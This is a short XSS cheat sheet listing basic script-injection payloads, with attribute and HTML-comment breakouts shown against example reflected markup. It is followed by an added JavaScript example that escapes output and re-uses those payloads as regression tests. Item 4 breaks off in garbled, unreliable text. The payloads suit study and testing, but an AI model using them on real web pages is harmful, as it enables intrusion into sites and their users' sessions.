XSS Cheat Sheet (Basic)

  1. Basic payload
<script>alert(1)</script>
<svg/onload=alert(1)>
<img src=x onerror=alert(1)>
  2. Add ' or " to break the payload out of the value of an HTML tag attribute
"><script>alert(1)</script>
'><script>alert(1)</script>
  • Example source code
<input id="keyword" type="text" name="q" value="REFLECTED_HERE">
  • After the payload is input
<input id="keyword" type="text" name="q" value=""><script>alert(1)</script>
  3. Add --> to break the payload out if the input lands in an HTML comment.
--><script>alert(1)</script>
  • Example source code
<!-- REFLECTED_HERE -->
  • After the payload is input
<!-- --><script>alert(1)</script> -->
  4. Add when the input inside or between opening/closing tags, tag can be ,<title, when input inside
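
An added example, not part of the original cheat sheet: the attribute and comment reflection points shown above, rendered without and with output encoding, and checked with the page's own payloads as regression inputs. All function names are hypothetical, and `countTags` is a simplified tokenizer written for this check, not a full HTML parser.

```javascript
// Added example, not from the original cheat sheet; all names are hypothetical.
const ESC = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode the characters that can end a quoted attribute value, a comment or text.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => ESC[ch]);
}

// The two reflection points from the page, without and with output encoding.
const renderInputUnsafe = (q) => `<input id="keyword" type="text" name="q" value="${q}">`;
const renderInputSafe = (q) => `<input id="keyword" type="text" name="q" value="${escapeHtml(q)}">`;
const renderCommentUnsafe = (q) => `<!-- ${q} -->`;
const renderCommentSafe = (q) => `<!-- ${escapeHtml(q)} -->`;

// Simplified tokenizer (assumption: enough for these templates only). Counts
// tags that start outside quoted attribute values and outside comments.
function countTags(html) {
  let state = 'data', tags = 0;
  for (let i = 0; i < html.length; i++) {
    const c = html[i];
    if (state === 'data') {
      if (html.startsWith('<!--', i)) { state = 'comment'; i += 3; }
      else if (c === '<' && /[a-zA-Z\/]/.test(html[i + 1] || '')) { state = 'tag'; tags++; }
    } else if (state === 'comment') {
      if (html.startsWith('-->', i)) { state = 'data'; i += 2; }
    } else if (state === 'tag') {
      if (c === '"' || c === "'") state = c;   // enter a quoted attribute value
      else if (c === '>') state = 'data';
    } else if (c === state) state = 'tag';      // matching quote closes the value
  }
  return tags;
}

// Payloads quoted from the cheat sheet, used here as regression inputs.
const ATTR_PAYLOAD = '"><script>alert(1)</script>';
const COMMENT_PAYLOAD = '--><script>alert(1)</script>';

// A safe input template must yield exactly 1 tag; a safe comment must yield 0.
function regressionReport() {
  return {
    inputUnsafe: countTags(renderInputUnsafe(ATTR_PAYLOAD)),
    inputSafe: countTags(renderInputSafe(ATTR_PAYLOAD)),
    commentUnsafe: countTags(renderCommentUnsafe(COMMENT_PAYLOAD)),
    commentSafe: countTags(renderCommentSafe(COMMENT_PAYLOAD)),
  };
}
console.log(regressionReport());
```

This encoding protects quoted attribute values and comments only; unquoted attributes, script blocks and URL attributes need their own context-specific handling. The simplest fix for the comment case is not to reflect user input into comments at all.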